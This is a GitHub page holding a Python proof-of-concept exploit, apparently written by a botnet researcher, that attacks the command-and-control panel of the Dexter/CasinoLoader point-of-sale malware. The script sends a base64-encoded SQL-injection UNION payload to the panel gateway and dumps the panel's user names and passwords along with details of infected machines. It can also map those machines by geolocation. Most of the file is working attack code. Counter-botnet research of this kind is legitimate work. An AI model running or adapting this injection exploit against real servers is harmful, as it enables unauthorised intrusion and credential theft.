Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
BAMF/IntegrationQueue/http/dexter.PoC.py
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
executable file
189 lines (169 sloc)
7.99 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import pycurl | |
| import urllib | |
| import cStringIO | |
| import base64 | |
| import argparse | |
| import sys | |
| import string | |
| import pygeoip | |
| version = "0.1-http_bots-PoC" | |
| def PrintHelp(): | |
| global version | |
| print "usage: dexter.PoC.py [-h] [action] [gateway url]" | |
| print "" | |
| print "Dexter CasinoLoader BAMF PoC v" + version | |
| print "Exploiting CasinoLoader panels for information" | |
| print "By Brian Wallace (@botnet_hunter)" | |
| print "" | |
| print "arguments:" | |
| print " action Actions to be taken against the botnet (default: dump)" | |
| print " dump - Print configuration information obtained from source file" | |
| print " graph - Graph all the bots in the command and control to Gexf file" | |
| print " source Path to non-obfuscated source code for the target bot (default: stdin)" | |
| print "" | |
| print("GPS:") | |
| print(" -m MaxMind Location Location of Maxmind database files (default .)") | |
| print "" | |
| print " -h, --help Print this message" | |
| print "" | |
| class DexterPanel: | |
| def __init__(self, gateway_url): | |
| self.gateway_url = gateway_url | |
| @staticmethod | |
| def _get_field(gateway, table, column, row): | |
| buf = cStringIO.StringIO() | |
| c = pycurl.Curl() | |
| c.setopt(c.URL, gateway) | |
| page = "' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + str(row) + " -- --" | |
| params = urllib.urlencode({'val': 'AA==', 'page': base64.b64encode(page)}) | |
| c.setopt(c.POSTFIELDS, params) | |
| c.setopt(c.HEADERFUNCTION, buf.write) | |
| c.perform() | |
| val = buf.getvalue() | |
| cookie = None | |
| for line in val.split('\n'): | |
| line = line.strip() | |
| if line.count('Set-Cookie:') > 0 and line.count("response") > 0: | |
| cookie = line | |
| cookie = cookie[cookie.find('=') + 1:] | |
| cookie = urllib.unquote(cookie) | |
| cookie = base64.b64decode(cookie) | |
| cookie = cookie[1:] | |
| cookie = cookie[:-2] | |
| break | |
| buf.close() | |
| return cookie | |
| def get_all_user_details(self): | |
| count = 0 | |
| users = [] | |
| while True: | |
| user = self._get_field(self.gateway_url, 'users', 'name', count) | |
| if user is None or user == "": | |
| break | |
| password = self._get_field(self.gateway_url, 'users', 'password', count) | |
| count += 1 | |
| users.append({'user': user, 'password': password}) | |
| return users | |
| def get_all_bot_details(self): | |
| count = 0 | |
| bots = [] | |
| while True: | |
| user = self._get_field(self.gateway_url, 'bots', 'RemoteIP', count) | |
| if user is None or user == "": | |
| break | |
| count += 1 | |
| bots.append({'RemoteIP': user, | |
| 'UID': self._get_field(self.gateway_url, 'bots', 'UID', count), | |
| 'Version': self._get_field(self.gateway_url, 'bots', 'Version', count), | |
| 'Username': self._get_field(self.gateway_url, 'bots', 'Username', count), | |
| 'Computername': self._get_field(self.gateway_url, 'bots', 'Computername', count), | |
| 'UserAgent': self._get_field(self.gateway_url, 'bots', 'UserAgent', count), | |
| 'OS': self._get_field(self.gateway_url, 'bots', 'OS', count), | |
| 'Architecture': self._get_field(self.gateway_url, 'bots', 'Architecture', count), | |
| 'Idle Time': self._get_field(self.gateway_url, 'bots', 'Idle Time', count), | |
| 'Process List': self._get_field(self.gateway_url, 'bots', 'Process List', count), | |
| 'LastVisit': self._get_field(self.gateway_url, 'bots', 'LastVisit', count), | |
| 'LastCommand': self._get_field(self.gateway_url, 'bots', 'LastCommand', count)}) | |
| return bots | |
| if __name__ == "__main__": | |
| parser = argparse.ArgumentParser(add_help=False) | |
| parser.add_argument('action', nargs='?', type=str, default="dump", help="Actions to be taken against pBots (default: dump)", choices=["dump", "graph"]) | |
| parser.add_argument('gateway', nargs='?', type=str, default=None, help="URL to Dexter bot gateway") | |
| parser.add_argument('-m', metavar='maxmind', type=str, nargs='?', default='./GeoLiteCity.dat') | |
| parser.add_argument('-h', '--help', default=False, required=False, action='store_true') | |
| args = parser.parse_args() | |
| if args.help or args.gateway is None: | |
| PrintHelp() | |
| sys.exit() | |
| if args.action == "dump": | |
| url = args.gateway | |
| dex = DexterPanel(url) | |
| print "User details: %s" % dex.get_all_user_details() | |
| print "Bot details: %s" % dex.get_all_bot_details() | |
| elif args.action == "graph": | |
| url = args.gateway | |
| dex = DexterPanel(url) | |
| bots = dex.get_all_bot_details() | |
| #load Maxmind | |
| sys.stderr.write('Loading MaxMind Database\n') | |
| gi = pygeoip.GeoIP(args.m) | |
| nodes = {} | |
| connections = [] | |
| nodes["C2"] = {"id": 0, "label": "C2", "mod": 0} | |
| highestnode = 1 | |
| #loop through all bots | |
| for bot in bots: | |
| ip = bot["RemoteIP"] | |
| geoip = gi.record_by_addr(ip) | |
| node = {"id": highestnode, "label": ip, "host": ip, "mod": 1} | |
| highestnode += 1 | |
| if geoip is not None: | |
| node['lat'] = geoip["latitude"] | |
| node['lng'] = geoip["longitude"] | |
| nodes[ip] = node | |
| connections.append([node['id'], 0]) | |
| print('<?xml version="1.0" encoding="UTF-8"?>') | |
| print('<gexf xmlns="http://www.gexf.net/1.2draft" version="1.2">') | |
| print(' <meta lastmodifieddate="2009-03-20">') | |
| print((' <creator>' + "bwall" + '</creator>')) | |
| print(' <description></description>') | |
| print(' </meta>') | |
| print(' <graph mode="static" defaultedgetype="directed">') | |
| print(' <attributes class="node" mode="static">') | |
| print(' <attribute id="modularity_class" title="Modularity Class" type="integer"></attribute>') | |
| print(' <attribute id="lat" title="lat" type="double"></attribute>') | |
| print(' <attribute id="lng" title="lng" type="double"></attribute>') | |
| print(' </attributes>') | |
| print(' <nodes>') | |
| for name, node in list(nodes.items()): | |
| if 'lat' in node: | |
| print((' <node id="' + str(node['id']) + '" label="' + | |
| node['label'] + '">')) | |
| print(' <attvalues>') | |
| print((' <attvalue for="modularity_class" value="' + | |
| str(node['mod']) + '"></attvalue>')) | |
| print(' <attvalue for="lat" value="' + str(node['lat']) + '"></attvalue>') | |
| print(' <attvalue for="lng" value="' + str(node['lng']) + '"></attvalue>') | |
| print(' </attvalues>') | |
| print(' </node>') | |
| else: | |
| print((' <node id="' + str(node['id']) + '" label="' + | |
| node['label'] + '">')) | |
| print(' <attvalues>') | |
| print((' <attvalue for="modularity_class" value="' + | |
| str(node['mod']) + '"></attvalue>')) | |
| print(' <attvalue for="lat" value="0"></attvalue>') | |
| print(' <attvalue for="lng" value="0"></attvalue>') | |
| print(' </attvalues>') | |
| print(' </node>') | |
| print(' </nodes>') | |
| print(' <edges>') | |
| count = 0 | |
| for node in connections: | |
| print((' <edge id="' + str(count) + '" source="' + str(node[0]) + | |
| '" target="' + str(node[1]) + '" />')) | |
| count += 1 | |
| print(' </edges>') | |
| print(' </graph>') | |
| print('</gexf>') |